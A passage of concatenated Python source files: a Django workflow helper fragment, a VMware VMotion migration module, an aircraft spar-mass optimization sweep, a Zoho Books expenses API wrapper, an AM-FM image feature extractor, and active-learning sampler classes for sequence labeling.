user.username, role) user.save() self.users[name] = user return user def add_users(self, users=[]): _users = [] for name, email, password, roles in users: _users.append(self.add_user(name=name, email=email, password=password, roles=roles)) return _users def add_role(self, name, permissions): ''' e.g. add_role('accountant', [('finance','BusinessPlan', 'can_review')]) ''' role, flag = Group.objects.get_or_create(name=name) log('role', role) for app_label, model_class_name, codename in permissions: model_class = django.db.models.get_model(app_label, model_class_name) content_type = ContentType.objects.get_for_model(model_class) permission = Permission.objects.get(content_type=content_type, codename=codename) role.permissions.add(permission) log('%s.permission' % role.name, permission) role.save() self.roles[name] = role return role def add_roles(self, roles=[]): _roles = [] for name, permissions in roles: _roles.append(self.add_role(name, permissions)) return _roles def setup_all(self): self.process.begin = self.activities[self.start_activity] self.process.end = self.activities[self.end_activity] self.process.save() def as_graph(self, to=None): from pygraphviz import AGraph g = AGraph(directed=True) for a in list(self.activities.values()): g.add_node(a.title, label=a.title) for t in list(self.transitions.values()): g.add_edge(t.input.title, t.output.title, label=t.name) if to: g.write(to) else: return str(g)
<gh_stars>0 ## @file vmotion.py ## @brief VMotion operations ## ## Detailed description (for Doxygen goes here) """ VMotion operations Detailed description (for [e]pydoc goes here) """ import os from pyVmomi import Vim from pyVmomi import Vmodl from pyVmomi import vmodl from pyVim.task import WaitForTask from pyVim.helpers import Log from pyVim import path from . import host import time from .invt import * from six import PY3 if PY3: long = int gSupportedVmotionTypes = ['vmotion', 'fault_tolerance', 'disks_only'] ## # Returns list of VMotion types supported by this module\ ## def GetSupportedVMotionTypes(): return gSupportedVmotionTypes ## # Given a datastore name, looks up the corresponding datastore URL # # @param si [in] Service instance to use # @param dsName [in] datastore name to lookup ## def GetDsUrl(si, dsName): if dsName == None: raise Exception("No target datastore specified for storage VMotion!") dsList = host.GetHostSystem(si).datastore dsUrl = [ds.info.url for ds in dsList if ds.name == dsName] if not dsUrl: raise Exception("Target datastore %s doesn't exist" % dsName) return dsUrl[0] ## # Given a target directory name and a source disk file path, generate the # target file path. # # @param targetDir [in] Target directory name # @param diskFilePath [in] disk file path from the backing information ## def GetTargetFileName(targetDir, diskFilePath): diskName = diskFilePath[diskFilePath.rfind('/') + 1:] return targetDir + '/' + diskName ## # Create disk specs needed for storage & disk only vmotions # # @param vm1 [in] VM instance to migrate # @param targetVmDir [in] Target directory to copy disks into # ## def CreateDiskSpecs(vm1, targetVmDir): if vm1.config == None: raise Exception("No config information found for VM") diskSpecs = [] ctlrMap = dict([ (dev.key, dev) for dev in vm1.config.hardware.device if issubclass(dev.__class__, Vim.Vm.Device.VirtualController) ]) for dev in vm1.config.hardware.device: if issubclass(dev.__class__, Vim.Vm.Device.VirtualDisk) and \ issubclass(dev.backing.__class__, Vim.Vm.Device.VirtualDevice.FileBackingInfo): spec = Vim.Host.VMotionManager.ReparentSpec() spec.SetUnitNumber(dev.unitNumber) #spec.SetDiskBackingInfo(dev.backing) spec.SetFilename( GetTargetFileName(path.DsPathToFsPath(targetVmDir), dev.backing.fileName)) if dev.backing.parent: spec.SetParentFilename( path.DsPathToFsPath(dev.backing.parent.fileName)) ctlr = ctlrMap[dev.controllerKey] spec.SetBusNumber(ctlr.busNumber) spec.SetControllerType(ctlr.__class__) diskSpecs.append(spec) if len(diskSpecs) == 0: Log("Devices: %s" % vm1.config.hardware.device) return diskSpecs ## ## Helper routine that retrieves the local config file path of a VM ## ## @param vm1 [in] The VM whose config file path is to be retrieved ## @param dsPath [in] If specified, this datastore path overrides the VM's cfg file path ## @param dsUrl [in] If specified, this datastore url overrides the VM's cfg file path ## def GetLocalCfgPath(vm1, dsPath=None, dsUrl=None): if dsPath == None: dsPath = vm1.config.files.vmPathName dsName = dsPath[dsPath.index("[") + 1:dsPath.rindex("]")] if dsName == "": return dsPath[dsPath.index("/"):] if dsUrl == None: datastore = [ds for ds in vm1.datastore if ds.name == dsName][0] dsUrl = datastore.GetInfo().GetUrl() relVmPath = dsPath[dsPath.rindex("]") + 2:] return dsUrl + "/" + relVmPath ## VMotion the VM through Hostd # # @param srcVm [in] The VM to be migrated # @param srcSi [in] ServiceInstance corresponding to the source host # @param dstSi [in] ServiceInstance corresponding to the dst host # @param dstPath [in] The config file path of the destination VM. # @param unsharedSwap [in] VMotion parameter for sharing the swap file # @param vmotionType [in] The type of VMotion requested # @param encrypt [in] Whether to use encryption for this VMotion # @param destDs [in] Destination datatore required for storage vmotions ## def Migrate(srcVm, srcSi, dstSi, dstPath=None, unsharedSwap=False, vmotionType=Vim.Host.VMotionManager.VMotionType.vmotion, destDs=None, ftType=None, destVm=None): fileMgr = srcSi.content.fileManager dirCreated = False VMotionType = Vim.Host.VMotionManager.VMotionType if srcVm.GetRuntime().GetPowerState( ) != Vim.VirtualMachine.PowerState.poweredOn: raise Exception("VM not powered on. Cannot VMotion.") if vmotionType not in gSupportedVmotionTypes: raise Exception("Unsupported VMotion type '%s'" % vmotionType) # Create the VMotion spec spec = Vim.Host.VMotionManager.Spec() migrationId = long(time.time()) if dstPath == None: dstPath = srcVm.GetConfig().GetFiles().GetVmPathName() dsUrl = None srcVmotionIp = host.GetVMotionIP(srcSi) Log("Getting source VMotion IP " + srcVmotionIp) spec.SetSrcIp(srcVmotionIp) dstVmotionIp = host.GetVMotionIP(dstSi) Log("Getting destination VMotion IP " + dstVmotionIp) spec.SetDstIp(dstVmotionIp) spec.SetType(vmotionType) if ftType: spec.SetFaultToleranceType(ftType) spec.dstVmDirPath, spec.dstVmFileName = os.path.split(dstPath) spec.srcVmPathName = srcVm.GetConfig().GetFiles().GetVmPathName() # Specify FT logging nic information for FT VMs if srcVm.GetRuntime().GetFaultToleranceState( ) != Vim.VirtualMachine.FaultToleranceState.notConfigured: srcLoggingIp = host.GetLoggingIP(srcSi) Log("Getting source Logging IP " + srcLoggingIp) spec.SetSrcLoggingIp(srcLoggingIp) dstLoggingIp = host.GetLoggingIP(dstSi) Log("Getting destination Logging IP " + dstLoggingIp) spec.SetDstLoggingIp(dstLoggingIp) # Generate disk specs for disk migrations if vmotionType == VMotionType.disks_only: dsUrl = GetDsUrl(srcSi, destDs) targetVmDir = dsUrl + '/' + srcVm.name Log("Creating target VM directory %s" % targetVmDir) try: fileMgr.MakeDirectory("[] " + targetVmDir) dirCreated = True except Vim.Fault.FileAlreadyExists as e: Log("File already exists") Log("Creating disk relocation specs") spec.SetDiskLocations(CreateDiskSpecs(srcVm, targetVmDir)) elif vmotionType == VMotionType.fault_tolerance and \ spec.GetFaultToleranceType() == "fault_tolerance_using_checkpoints": if not destDs: targetVmDir = destVm.config.files.suspendDirectory for url in destVm.config.datastoreUrl: targetVmDir.replace("[%s] " % url.name, url.url) else: dsUrl = GetDsUrl(dstSi, destDs) targetVmDir = dsUrl + '/' + destVm.name Log("Creating disk relocation specs for %s" % targetVmDir) spec.SetDiskLocations(CreateDiskSpecs(destVm, targetVmDir)) Log("Getting source UUID") spec.SetSrcUuid(host.GetHostUuid(srcSi)) Log("Getting destination UUID") spec.SetDstUuid(host.GetHostUuid(dstSi)) spec.SetPriority(Vim.VirtualMachine.MovePriority.defaultPriority) spec.SetUnsharedSwap(unsharedSwap) spec.SetMigrationId(migrationId) srcMgr = host.GetVmotionManager(srcSi) dstMgr = host.GetVmotionManager(dstSi) try: # Prepare the VMotion operation Log("Preparing source") connect.SetSi(srcSi) print(spec) prepareSrcTask = srcMgr.PrepareSourceEx(spec, srcVm) WaitForTask(prepareSrcTask) if vmotionType != VMotionType.disks_only: Log("Preparing destination") connect.SetSi(dstSi) resPool = host.GetRootResourcePool(dstSi) prepareDstTask = dstMgr.PrepareDestinationEx(spec, resPool) WaitForTask(prepareDstTask) # Initiate the VMotion operation if vmotionType != VMotionType.disks_only: if destVm is not None: localPath = GetLocalCfgPath(destVm, dstPath, dsUrl) else: localPath = GetLocalCfgPath(srcVm, dstPath, dsUrl) Log("Initiating destination with path " + localPath) dstState = dstMgr.InitiateDestination(migrationId, localPath) dstId = dstState.GetDstId() dstTask = dstState.GetDstTask() else: dstId = 0 Log("Initiating source") connect.SetSi(srcSi) srcTask = srcMgr.InitiateSourceEx(migrationId, dstId) Log("Waiting for completion") try: if vmotionType != VMotionType.disks_only: WaitForTask(dstTask, si=dstSi) WaitForTask(srcTask, si=srcSi) except Vmodl.Fault.ManagedObjectNotFound as e: Log("Task no longer present.") Log("VMotion succeeded.") # InitiateSourceEx/Destination throw InvalidArgument # when a vmotion starts with an already used migrationID # that means if we call CompleteSource/CompleteDestination # we will cancel the first vmotion with that id except vmodl.fault.InvalidArgument as e: if dirCreated: try: Log("Cleaning up directory") fileMgr.deleteFile("[] " + targetVmDir) except Exception as e: Log("Caught exception %s while deletion directory" % e) Log("VMotion failed. Got exception " + str(e)) raise except Exception as e: # Complete the VMotion operation Log("Completing source") srcMgr.CompleteSource(migrationId) if vmotionType != VMotionType.disks_only: Log("Completing destination") dstMgr.CompleteDestination(migrationId) if dirCreated: try: Log("Cleaning up directory") fileMgr.deleteFile("[] " + targetVmDir) except Exception as e: Log("Caught exception %s while deletion directory" % e) Log("VMotion failed. Got exception " + str(e)) raise # Complete the VMotion operation Log("Completing source") srcMgr.CompleteSource(migrationId) if vmotionType != VMotionType.disks_only: Log("Completing destination") dstMgr.CompleteDestination(migrationId)
<filename>studies/MultiBoomSparMass_v2/sweep.py """ This script generates data used to estimate spar mass as a function of lift force (i.e. total weight) and span. """ ### Imports from aerosandbox.structures.beams import * import copy ### Set up sweep variables # n_booms = 1 # n_booms = 2 # load_location_fraction = 0.50 n_booms = 3 load_location_fraction = 0.60 res = 15 masses = np.logspace(np.log10(5), np.log10(3000), res) spans = np.logspace(np.log10(3), np.log10(120), res) Masses, Spans = np.meshgrid(masses, spans, indexing="ij") Spar_Masses = np.zeros_like(Masses) ### Set up problem opti = cas.Opti() mass = opti.parameter() span = opti.parameter() beam = TubeBeam1( opti=opti, length=span / 2, points_per_point_load=100, diameter_guess=10, thickness=0.60e-3, bending=True, torsion=False ) lift_force = 9.81 * mass # load_location = opti.variable() # opti.set_initial(load_location, 12) # opti.subject_to([ # load_location > 1, # load_location < beam.length - 1, # ]) assert (n_booms == np.array([1, 2, 3])).any() if n_booms == 2 or n_booms == 3: load_location = beam.length * load_location_fraction beam.add_point_load(location=load_location, force=-lift_force / n_booms) beam.add_elliptical_load(force=lift_force / 2) beam.setup() # Constraints (in addition to stress) opti.subject_to([ # beam.u[-1] < 2, # tip deflection. Source: http://web.mit.edu/drela/Public/web/hpa/hpa_structure.pdf # beam.u[-1] > -2 # tip deflection. Source: http://web.mit.edu/drela/Public/web/hpa/hpa_structure.pdf beam.du * 180 / cas.pi < 10, # local dihedral constraint beam.du * 180 / cas.pi > -10, # local anhedral constraint cas.diff(beam.nominal_diameter) < 0, # manufacturability ]) # # Zero-curvature constraint (restrict to conical tube spars only) # opti.subject_to([ # cas.diff(cas.diff(beam.nominal_diameter)) == 0 # ]) opti.minimize(beam.mass) p_opts = {} s_opts = {} s_opts["max_iter"] = 1e6 # If you need to interrupt, just use ctrl+c # s_opts["mu_strategy"] = "adaptive" opti.solver('ipopt', p_opts, s_opts) ### Do the sweep for i in range(len(masses)): iterable = range(len(spans)) iterable = iterable[::-1] if i % 2 != 0 else iterable for j in iterable: opti.set_value(mass, Masses[i, j]) opti.set_value(span, Spans[i, j]) sol = opti.solve() opti.set_initial(sol.value_variables()) beam_sol = copy.deepcopy(beam).substitute_solution(sol) Spar_Masses[i, j] = beam_sol.mass * 2 np.save("masses", Masses) np.save("spans", Spans) np.save("spar_masses", Spar_Masses) # Run a sanity check beam_sol.draw_bending() from fit import *
<reponame>harshal-choudhari/books-python-wrappers #$Id$# from books.util.ZohoHttpClient import ZohoHttpClient from books.parser.ExpensesParser import ExpensesParser from os.path import basename from books.api.Api import Api from json import dumps base_url = Api().base_url + 'expenses/' parser = ExpensesParser() zoho_http_client = ZohoHttpClient() class ExpensesApi: """Expenses Api is used to: 1.List expenses with pagination. 2.Get the details of an expense. 3.Create a billable or non-billable expense. 4.Update an existing expense. 5.Delete an expense. 6.Get history and comments of an expense. 7.Returns the receipt attached to an expense. 8.Attach a receipt to an expense. 9.Delete the receipt attached to the expense. """ def __init__(self, authtoken, organization_id): """Initialize Expenses Api using user's authtoken and organization id. Args: authtoken(str): User's Authtoken. organization_id(str): User's organization id. """ self.headers = { 'Authorization': 'Zoho-oauthtoken ' + authtoken, } self.details = { 'organization_id': organization_id } def get_expenses(self, parameter=None): """List expenses with pagination. Args: parameter(dict, optional): Filter with which expenses list has to be displayed. Defaults to None. Returns: instance: Expenses list object. """ resp = zoho_http_client.get(base_url, self.details, self.headers, parameter) return parser.get_list(resp) def get(self, expense_id): """Get details of an expense. Args: expense_id(str): Expense id. Returns: instance: Expense object. """ url = base_url + expense_id resp = zoho_http_client.get(url, self.details, self.headers) return parser.get_expense(resp) def create(self, expense, receipt=None): """Create an expense. Args: expense(instance): Expense object. receipt(file, optional): Expense receipt file to attach.Allowed Extensions: gif, png, jpeg, jpg, bmp and pdf. Returns: instance: Expense object. """ json_object = dumps(expense.to_json()) data = { 'JSONString': json_object } if receipt is not None: attachments = [{ 'receipt': { 'filename': basename(receipt), 'content': open(receipt).read() } }] else: attachments = None resp = zoho_http_client.post(base_url, self.details, self.headers, data, None, \ attachments) return parser.get_expense(resp) def update(self, expense_id, expense, receipt=None): """Update an existing expense. Args: expense_id(str): Expense id. expense(instance): Expense object. receipt(file): Expense receipt file to attach. Allowed Extensions: gif, png, jpeg, jpg, bmp and pdf. Returns: instance: Expense object. """ url = base_url + expense_id json_object = dumps(expense.to_json()) data = { 'JSONString': json_object } if receipt is None: attachments = None else: attachments = [{ 'receipt': { 'filename': basename(receipt), 'content': open(receipt).read() } }] resp = zoho_http_client.put(url, self.details, self.headers, data, None, attachments) return parser.get_expense(resp) def delete(self, expense_id): """Delete an existing expense. Args: expense_id(str): Expense id. Returns: str: Success message('The expense has been deleted.'). """ url = base_url + expense_id resp = zoho_http_client.delete(url, self.details, self.headers) return parser.get_message(resp) def list_comments_history(self, expense_id): """Get history and comments of an expense. Args: expense_id(str): Expense id. Returns: instance: comments list object. """ url = base_url + expense_id + '/comments' resp = zoho_http_client.get(url, self.details, self.headers) return parser.get_comments(resp) def get_receipt(self, expense_id, preview=None): """Get the receipt attached to an expense. Args: expense_id(str): Expense id. preview(bool, optional): True to get the thumbnail of the receipt. Returns: file: Returns the receipt attached to the expense. """ url = base_url + expense_id + '/receipt' if preview is not None: query = { 'preview': preview } else: query = None resp = zoho_http_client.getfile(url, self.details, self.headers, query) return resp def add_receipt(self, expense_id, receipt): """Attach a receipt to an expense. Args: expense_id(str): Expense id. receipt(file): Receipt to be attached.Allowed Extensions: gif, png, jpeg, jpg, bmp, pdf, xls, xlsx, doc and docx. Returns: str: Success message('The expense receipt has been attached.'). """ url = base_url + expense_id + '/receipt' attachments = [{ 'receipt': { 'filename': basename(receipt), 'content': open(receipt).read() } }] data = { 'JSONString': '' } resp = zoho_http_client.post(url, self.details, self.headers, data, None, attachments) return parser.get_message(resp) def delete_receipt(self, expense_id): """Delete the receipt attached to the expense. Args: expense_id(str): Expense id. Returns: str: Success message('The attached expense receipt has been deleted.'). """ url = base_url + expense_id + '/receipt' resp = zoho_http_client.delete(url, self.details, self.headers) return parser.get_message(resp)
<reponame>javadch2021/pyfeats # -*- coding: utf-8 -*- """ ============================================================================== @author: <NAME> @author: <NAME>, @author: <NAME> @author: <NAME> @reference: Murray, An AM-FM model for Motion Estimation in Atherosclerotic Plaque Videos Murray, Multiscale AMFM Demodulation and Image Reconstruction methods with Improved Accuracy Pattichis, Medical Image Analysis Using AM-FM Models and Methods ============================================================================== """ import numpy as np from scipy import signal import warnings def _gabor_kernel_2D(theta, lamda, gamma, bandwidth, phase, overlapIndex): qFactor = (1/np.pi) * np.sqrt( (np.log(overlapIndex)/2) ) * \ ( (2**bandwidth + 1) / (2**bandwidth - 1) ) sigma = lamda*qFactor n = np.ceil(4*sigma) [x,y] = np.mgrid[-n:(n+2),-n:(n+2)] xTheta = x * np.cos(theta) + y * np.sin(theta) yTheta = -x * np.sin(theta) + y * np.cos(theta) gaussian = np.exp(-(( xTheta**2) + gamma**2.* (yTheta**2))/(2*sigma**2)) res = gaussian * np.cos(2*np.pi*xTheta/lamda + phase) maxFft = abs(np.fft.fft2(res)).max() normalize = np.fft.fft2(res)/maxFft result = np.real(np.fft.ifft2(normalize)) return result, sigma def _gaussian_function(f0, s0, overlapIndex): over = np.sqrt(2*np.log(1/overlapIndex)) sigma = s0*over/(s0*f0 - over) n = np.ceil(2*sigma) [x,y] = np.mgrid[-n:(n+2),-n:(n+2)] res = np.exp(-1/2*(x**2 + y**2)/sigma**2) res = res / res.sum() return res def _filterbank(): ''' Returns ------- filter : list List of 41 filters for AM-FM multi-scale analysis. ''' lamda0 = 2 orientations = 8 scales = 5 gamma = 1 phase = 0 bandwidth = 1 overlapIndex = 0.5 offset = 0 theta = np.arange(offset,np.pi - np.pi/orientations + offset + np.pi/orientations, (np.pi/orientations)) lamda = lamda0 filters = [] for sc_index in range(scales, 0, -1): lamda0 = lamda for th in range(theta.shape[0]): result, sig = _gabor_kernel_2D(theta[th], lamda, gamma, bandwidth, phase, 1/overlapIndex); filters .append(result) lamda = lamda0 * 2**bandwidth # Add DC Filter f1 = 2*np.pi/lamda result = _gaussian_function(f1, sig, overlapIndex) filters.append(result) return filters def _calculate_amfm(f): ''' Parameters ---------- f : numpy ndarray Image of dimensions N1 x N2. Returns ------- IA : numpy ndarray instantaneous amplitude (a_n). IP : numpy ndarray instanteneous phase (φ_n). IFx : numpy ndarray instantanteous frequency (grad φ1_n). IFy : numpy ndarray instantanteous frequency (grad φ2_n). ''' N1, N2 = f.shape IA = np.abs(f) IP = np.angle(f) IANorm = np.divide(f, IA+1e-16) IFx = np.zeros((N1,N2), np.double) IFy = np.zeros((N1,N2), np.double) for i in range(1,N1-1): for j in range(1,N2-1): IFx[i,j] = np.abs(np.arccos(np.real((IANorm[i+1,j]+IANorm[i-1,j]) / (2*IANorm[i,j])))) IFy[i,j] = np.abs(np.arccos(np.real((IANorm[i,j+1]+IANorm[i,j-1]) / (2*IANorm[i,j])))) return IA, IP, IFx, IFy def _dca(band): ''' Parameters ---------- band : list The band. A list of IA, IP, IFx, IFy. Returns ------- IA : list Max instantaneous amplitude for given band. IP : list Max instanteneous phase for given band. IFx : list Max instantanteous frequency for given band. IFy : list Max instantanteous frequency for given band. ''' IA = np.zeros(band[0][0].shape) IP = np.zeros(band[0][1].shape) IFx = np.zeros(band[0][2].shape) IFy = np.zeros(band[0][3].shape) w, h = band[0][0].shape for i in range(w): for j in range(h): pos = 0 temp = band[pos][0][i,j] # band[pos].IA[i,j] for l in range(len(band)): if temp < band[l][0][i,j]: # band[l].IA[i,j] pos = l temp = band[l][0][i,j] IA[i,j] = temp IP[i,j] = band[pos][1][i,j] IFx[i,j] = band[pos][2][i,j] IFy[i,j] = band[pos][3][i,j] return IA, IP, IFx, IFy def amfm_features(f, bins=32): ''' Parameters ---------- f : numpy ndarray Image of dimensions N1 x N2. bins: int, optional Bins for the calculated histogram. The default is 32. Returns ------- features : numpy ndarray Histogram of IA, IP, IFx, IFy as a concatenated vector. labels : list Labels of features. ''' warnings.simplefilter(action='ignore', category=RuntimeWarning) AMFM = [] filters = _filterbank() f_hilbert = signal.hilbert(f) #mask_c = _image_xor(mask) #mask_conv = [] #for filtre in filters: # oneskernel = np.ones(filtre.shape) # temp = signal.convolve2d(mask_c, oneskernel,'same') # temp = np.abs(np.sign(temp)-1) # mask_conv.append(temp) for i, filtre in enumerate(filters): f_filtered = signal.convolve2d(f_hilbert, np.rot90(filtre), mode='same', boundary='fill', fillvalue=0) #f_filtered = f_filtered * mask_conv[i] IA, IP, IFx, IFy = _calculate_amfm(f_filtered) IA = np.nan_to_num(IA) IP = np.nan_to_num(IP) IFx = np.nan_to_num(IFx) IFy = np.nan_to_num(IFy) AMFM.append([IA, IP, IFx, IFy]) # Access like this: band[i][0] for IA, band[i][1] for IP, # band[i][2] for IFx and band[i][3] for IFy high = [] med = [] low = [] dc = [] for i in range(len(filters)): if (i <= 7): high.append(AMFM[i]) elif (i<=23): med.append(AMFM[i]) elif (i<=39): low.append(AMFM[i]) else: dc.append(AMFM[i]) IAl, IPl, IFxl, IFyl = _dca(low) IAl = (IAl > np.percentile(IAl,50)).astype(np.float64) * IAl reconstructionImgDCAl = np.real(IAl * np.cos(IPl)) H1 = np.histogram(reconstructionImgDCAl, bins=bins, density=True)[0] IAm, IPm, IFxm, IFym = _dca(med) IAm = (IAm > np.percentile(IAl,50)).astype(np.float64) * IAm reconstructionImgDCAm = np.real(IAm * np.cos(IPm)) H2 = np.histogram(reconstructionImgDCAm, bins=bins, density=True)[0] IAh, IPh, IFxh, IFyh = _dca(high) IAh = (IAh > np.percentile(IAl,50)).astype(np.float64) * IAh reconstructionImgDCAh = np.real(IAh * np.cos(IPh)) H3 = np.histogram(reconstructionImgDCAh, bins=bins, density=True)[0] IAdc, IPdc, IFxdc, IFydc = _dca(dc) reconstructionImgDCAdc = np.real(IAdc * np.cos(IPdc)) H4 = np.histogram(reconstructionImgDCAdc, bins=bins, density=True)[0] features = np.concatenate([H1, H2, H3, H4]) labels = [] labels.append(['AMFM_low'+str(i) for i in range(32)]) labels.append(['AMFM_med'+str(i) for i in range(32)]) labels.append(['AMFM_high'+str(i) for i in range(32)]) labels.append(['AMFM_dc'+str(i) for i in range(32)]) labels = [item for sublist in labels for item in sublist] warnings.simplefilter(action='default', category=RuntimeWarning) return features, labels def plotAMFM(f): pass
<reponame>tech-sketch/SeqAL import math import random from collections import defaultdict from typing import Dict, List, Optional, Tuple import numpy as np import torch from flair.data import Sentence from sklearn.base import BaseEstimator from sklearn.cluster import KMeans from sklearn.preprocessing import MinMaxScaler from seqal.data import Entities, Entity from seqal.tagger import SequenceTagger from .base import BaseSampler class RandomSampler(BaseSampler): """Random sampling method""" def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Random sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: tagger: The tagger after training label_names (List[str]): Label name of all dataset embeddings: The embeddings method Returns: List[int]: Queried sentence ids. """ random.seed(0) sent_ids = list(range(len(sentences))) random_sent_ids = random.sample(sent_ids, len(sent_ids)) queried_sent_ids = self.query( sentences, random_sent_ids, query_number, token_based ) return queried_sent_ids class LeastConfidenceSampler(BaseSampler): """Least confidence sampler https://dl.acm.org/doi/10.5555/1619410.1619452 Args: BaseSampler: BaseSampler class. """ def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Least confidence sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: tagger: The tagger after training label_names (List[str]): Label name of all dataset embeddings: The embeddings method Returns: List[int]: Queried sentence ids. """ tagger = kwargs["tagger"] self.predict(sentences, tagger) scores = self.score(sentences, tagger) sorted_sent_ids = self.sort(-scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def score( self, sentences: List[Sentence], tagger: SequenceTagger, kwargs: Optional[dict] = None, ) -> np.ndarray: """Calculate score for each sentence""" log_probs = tagger.log_probability(sentences) scores = 1 - np.exp(log_probs) return scores class MaxNormLogProbSampler(BaseSampler): """Maximum Normalized Log-Probability sampler https://arxiv.org/abs/1707.05928 Args: BaseSampler: BaseSampler class. """ def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Maximum Normalized Log-Probability sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: tagger: The tagger after training label_names (List[str]): Label name of all dataset embeddings: The embeddings method Returns: List[int]: Queried sentence ids. """ tagger = kwargs["tagger"] self.predict(sentences, tagger) scores = self.score(sentences, tagger) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def score( self, sentences: List[Sentence], tagger: SequenceTagger, kwargs: Optional[dict] = None, ) -> np.ndarray: """Calculate score for each sentence""" log_probs = tagger.log_probability(sentences) lengths = np.array([len(sent) for sent in sentences]) normed_log_probs = log_probs / lengths return normed_log_probs class StringNGramSampler(BaseSampler): """The StringNGramSampler class https://aclanthology.org/C10-1096.pdf Args: BaseSampler: BaseSampler class. """ def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """StringNGram similarity sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: tagger: The tagger after training label_names (List[str]): Label name of all dataset embeddings: The embeddings method Returns: List[int]: Queried sentence ids. """ tagger = kwargs["tagger"] embeddings = kwargs["embeddings"] self.predict(sentences, tagger) entities = self.get_entities(sentences, embeddings, tag_type) # If no entities, return random indices if not entities.entities: random_sampler = RandomSampler() return random_sampler(sentences, tag_type, query_number, token_based) scores = self.score(sentences, entities) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def score( self, sentences: List[Sentence], entities: Entities, kwargs: Optional[dict] = None, ) -> np.ndarray: """Calculate score for each sentence""" sentence_scores = [0] * len(sentences) diversities_per_sent = self.sentence_diversities(entities) for sent_id, score in diversities_per_sent.items(): sentence_scores[sent_id] = score return np.array(sentence_scores) def trigram(self, entity: Entity) -> List[str]: """Get trigram of a entity Args: entity (Entity): Entity contains text Returns: List[str]: Entity trigram with ordinal number e.g. "Peter" will return ['$$P1', '$Pe1', 'Pet1', 'ete1', 'ter1', 'er$1', 'r$$1'] e.g. "prepress" will return ['$$p1', '$pr1', 'pre1', 'rep1', 'epr1', 'pre2', 'res1', 'ess1', 'ss$1', 's$$1'] """ counter = defaultdict(int) entity = "$$" + entity.text + "$$" entity = entity.replace(" ", "_") trigrams = [] for i in range(len(entity) - 3 + 1): span = entity[i : i + 3] # noqa: E203 counter[span] += 1 trigrams.append(span + str(counter[span])) return trigrams def sentence_diversities(self, entities: Entities) -> Dict[int, float]: """Get diversity score of each sentence""" entities_per_label = entities.group_by_label entities_per_sentence = entities.group_by_sentence # Calculate similarities of all entities in one label similarities_per_label = self.similarity_matrix_per_label( entities_per_label ) # {"ORG": matrix, "PER": matrix} # Create index map # entity_id_map[label][sent_id][entity_id] = entity_id_in_label_entity_list sentence_count = max(entities_per_sentence.keys()) + 1 max_entity_count = max( [len(entities) for entities in entities_per_sentence.values()] ) entity_id_map = self.get_entity_id_map( entities_per_label, sentence_count, max_entity_count ) # Calculate diversity for each sentence sentence_scores = self.calculate_diversity( entities_per_sentence, entity_id_map, similarities_per_label ) return sentence_scores def calculate_diversity( self, entities_per_sentence: Dict[str, List[Entity]], entity_id_map: dict, similarities_per_label: dict, ) -> float: """Calculate diversity score for a sentence""" sentence_scores = {} for sent_id, sentence_entities in entities_per_sentence.items(): scores = [] for entity in sentence_entities: entity_id_in_label_list = entity_id_map[entity.label][entity.sent_id][ entity.id ] similarities = similarities_per_label[entity.label][ int(entity_id_in_label_list) ] scores.append(float(similarities.min())) sentence_score = sum(scores) / len(sentence_entities) sentence_scores[sent_id] = sentence_score return sentence_scores def get_entity_id_map( self, entities_per_label: Dict[str, List[Entity]], sentence_count: int, max_entity_count: int, ) -> Dict[str, np.ndarray]: """Get index map of entity from sentence id to the id in entity_per_label""" entity_id_map = {} for label, label_entities in entities_per_label.items(): if label not in entity_id_map: entity_id_map[label] = np.ones((sentence_count, max_entity_count)) for i, entity in enumerate( label_entities ): # entity id in label entities list print(i, entity, entity.sent_id, entity.id) entity_id_map[label][entity.sent_id][entity.id] = i print(entity_id_map) return entity_id_map def similarity_matrix_per_label( self, entities_per_label: Dict[str, List[Entity]] ) -> Dict[str, np.ndarray]: """Calculate similarity matrix of entities in each label""" similarity_matrix_per_label = {} for label, label_entities in entities_per_label.items(): entities_trigrams = [self.trigram(e) for e in label_entities] similarity_matrix = [] for i, entity in enumerate(label_entities): entity_trigrams = self.trigram(entity) similarities = [ self.trigram_cosine_similarity( entity_trigrams, entities_trigrams[i] ) for i in range(len(label_entities)) ] similarity_matrix.append(similarities) similarity_matrix_per_label[label] = np.array(similarity_matrix) return similarity_matrix_per_label def trigram_cosine_similarity( self, entity_trigram1: List[str], entity_trigram2: List[str] ) -> float: """Calculate trigram consine similarity""" similarity = len(set(entity_trigram1) & set(entity_trigram2)) / math.sqrt( len(entity_trigram1) * len(entity_trigram2) ) return similarity class DistributeSimilaritySampler(BaseSampler): """Distribute similarity sampler We create distribute similarity sampling as a kind of diversity sampling method. Different with most of sampling methods that are based on sentence level, Distribute similarity sampling method is implemented on token level. We calculate the similarity between entity pair, the low similarity pair means high diversity. Args: BaseSampler: BaseSampler class. """ def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Distribute similarity sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: tagger: The tagger after training label_names (List[str]): Label name of all dataset embeddings: The embeddings method Returns: List[int]: Queried sentence ids. """ tagger = 